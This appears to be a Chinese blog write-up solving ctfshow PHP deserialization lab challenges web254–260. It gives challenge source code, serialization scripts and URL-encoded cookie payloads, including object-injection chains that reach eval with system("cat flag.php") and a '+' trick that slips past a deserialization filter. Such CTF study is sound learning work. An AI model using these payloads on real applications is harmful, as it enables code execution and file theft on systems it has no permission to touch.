2. 程式人生 > 其它 >ctfshow web入門 反序列化

ctfshow web入門 反序列化

阿新 發佈:2021-02-14

技術標籤:CTFwebphp

文章目錄

web254

<?php
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return
 
 $this->isVip;
    }
    public function login($u,$p){
        if($this->username===$u&&$this->password===$p){
            $this->isVip=true;
        }
        return $this->isVip;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag
 
;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = new ctfShowUser();
    if($user->login($username
 
,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

payload:

?username=xxxxxx&password=xxxxxx

web255

<?php
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

想要得到flag,需要觸發vipOneKeyGetFlag()函式,需要讓isVip這個引數為true,也就是在序列化時,要讓isVip=true

序列化程式碼:

<?php
class ctfShowUser{
    public $isVip=true;
}
$a=new ctfShowUser();
$b=serialize($a);
echo urlencode($b);
?>

payload:

?username=xxxxxx&password=xxxxxx

user=O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

這題不僅僅需要get傳username和password,還需要cookie傳一個序列化後的user,可以用burp抓包,在裡面將cookie值改為"user=xxxxxx"。(注意:這個值需要經過url編碼)
在這裡插入圖片描述

web256

<?php
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            if($this->username!==$this->password){
                    echo "your flag is ".$flag;
              }
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

分析程式碼,這題和上一題的區別就是get傳入的username和password必須不相等。

序列化程式碼:

<?php
class ctfShowUser{
    public $username='shyshy';
    public $password='xxxxxx';
    public $isVip=true;
}
$a=new ctfShowUser();
$b=serialize($a);
echo urlencode($b);
?>

payload:

?username=shyshy&password=xxxxxx

user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22shyshy%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

web257

<?php
error_reporting(0);
highlight_file(__FILE__);

class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class backDoor{
    private $code;
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}

這題eval函式在類backDoor中,可以用類ctfShowUser中的建構函式__construtc()來建立一個新的backDoor物件,在利用backDoor的變數$code來執行cat flag.php

序列化程式碼:

<?php
class ctfShowUser{
    private $class = ' ';
    public function __construct(){
        $this->class=new backDoor();
    }
}
class backDoor{
    private $code='system("cat flag.php");';
    }
$a=new ctfShowUser();
$b=urlencode(serialize($a));
echo $b;

payload:

?username=xxxxxx&password=xxxxxx

user=O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A23%3A%22system%28%22cat+flag.php%22%29%3B%22%3B%7D%7D

web258

<?php
error_reporting(0);
highlight_file(__FILE__);

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
    public $class = 'info';

    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    public $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class backDoor{
    public $code;
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
        $user = unserialize($_COOKIE['user']);
    }
    $user->login($username,$password);
}

這題想過濾“O:數字”的格式,只需要在數字前加一個+,就可以繞過

序列化程式碼:

<?php
class ctfShowUser
{
    public $class ;
    public function __construct(){
        $this->class=new backDoor();
    }
}
class backDoor
{
    public $code='system("cat flag.php");';
}
$a=new ctfShowUser();
$b=urlencode(serialize($a));
echo $b;

payload:

?username=xxxxxx&password=xxxxxx

user=O%3A%2b11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A%2b8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A23%3A%22system%28%22cat+flag.php%22%29%3B%22%3B%7D%7D

web259

大佬的部落格看的我有點懵逼,日後一定補上。

web260

<?php

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

if(preg_match('/ctfshow_i_love_36D/',serialize($_GET['ctfshow']))){
    echo $flag;
}

上一題和這一題之間的跳躍有點大,這題就是序列化的前面要有字串ctfshow_i_love_36D,那直接get傳這個字串就行
payload:

?ctfshow=ctfshow_i_love_36D

相關推薦

ctfshow web入門 序列

技術標籤:CTFwebphp 文章目錄 web254web255web256web257web258web259web260 web254 <?php error_reporting(0);

CTFshow-WEB入門-序列(持續更新)

技術標籤:序列序列PHP序列web安全 前言 簡單的序列直接給出payload,有意思的,較為複雜的和我不太會的會分析一波。

ctfshow web入門序列

先來點知識點 序列序列的概念: 序列就是將物件轉換成字串。字串包括 屬性名 屬性值 屬性型別和該物件對應的類名。

CTF-Web-PHP序列

概念解釋 PHP 序列漏洞又叫做 PHP 物件注入漏洞,我覺得這個表達很不直白,也不能說明根本的問題,不如我們叫他 PHP 物件的屬性篡改漏洞好了(別說這是我說的~~)

PHP 序列漏洞入門學習筆記

參考文章: PHP序列漏洞入門 easy_serialize_php wp 實戰經驗丨PHP序列漏洞總結

Django REST framework (DRF)框架入門序列---序列【二】

1. 序列器-Serializer 作用: 1. 序列,序列器會把模型物件轉換成字典,經過response以後變成json字串

PHP 序列——入門

0x00 引言 什麼是序列 序列 類物件在儲存的過程中需要將物件的資訊轉換為可以傳輸的形式,故將物件進行序列

基於Spring Web Jackson對RequestBody序列失敗的解決

最近在用Spring Web做一些Restful API的實現試驗,碰到了@RequestBody 的JSON無法被正常序列的問題。服務端的程式碼大致如下:

UNCTF-WEB: easyunserialize(序列字元逃逸)

序列字元逃逸實驗 原理:利用字串過濾使的原來序列的讀取的s長度發生了改變(多出一個字元就能逃逸一個字元)

[web安全原理]PHP序列漏洞

技術標籤:字串javapythonphp程式語言 前言 這幾天一直在關注新管狀病毒,從微博到各大公眾號朋友圈瞭解感覺挺嚴重的看微博感覺特別嚴重看官方說法感覺還行那就取中間的吧 自己要會對這個東西要有理性的判斷。關

WEB漏洞——PHP序列

PHP序列 序列 首先說說什麼是序列 序列給我們傳遞物件提供了一種簡單的方法。serialize()將一個物件轉換成一個字串,並且在轉換的過程中可以儲存當前變數的值

CTFSHOW-日刷-[吃雞杯]cjbweb/簡單序列

<?php error_reporting(0); $safe=\"Hack me!\"; class Hacker{ public $name=\"var_dump\"; public $msg=\"Happy to cjb\";

ctfshow-擊劍杯-esaypop(序列構造pop鏈)

題目地址:https://ctf.show/challenges 題目原始碼: <?php highlight_file (__FILE__); error_reporting(0);

fastJson序列處理泛型 我能從中學到什麼

都會的json解析 在我們日常的編碼工作中,常常會制定或者遇到這樣的json結構

ProtoStuff無法序列Deprecated註解成員問題記錄

在開發過程中,遇到一個鬼畜的問題,在DO的某個成員上新增@Deprecated註解之後,通過ProtoStuff序列得到的DO中,這個成員一直為null;花了不少時間才定位這個問題,特此記錄一下

Java JDBC導致的序列攻擊原理解析

這篇文章主要介紹了Java JDBC導致的序列攻擊原理解析,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

JAVA序列序列的底層實現原理解析

一、基本概念 1、什麼是序列序列  (1)Java序列是指把Java物件轉換為位元組序列的過程,而Java序列是指把位元組序列恢復為Java物件的過程;

Python序列序列pickle用法例項

這篇文章主要介紹了Python序列序列pickle用法例項,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

Django框架序列序列操作詳解

本文例項講述了Django框架序列序列操作。分享給大家供大家參考,具體如下:

java物件序列序列原理解析

這篇文章主要介紹了java物件序列序列原理解析,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下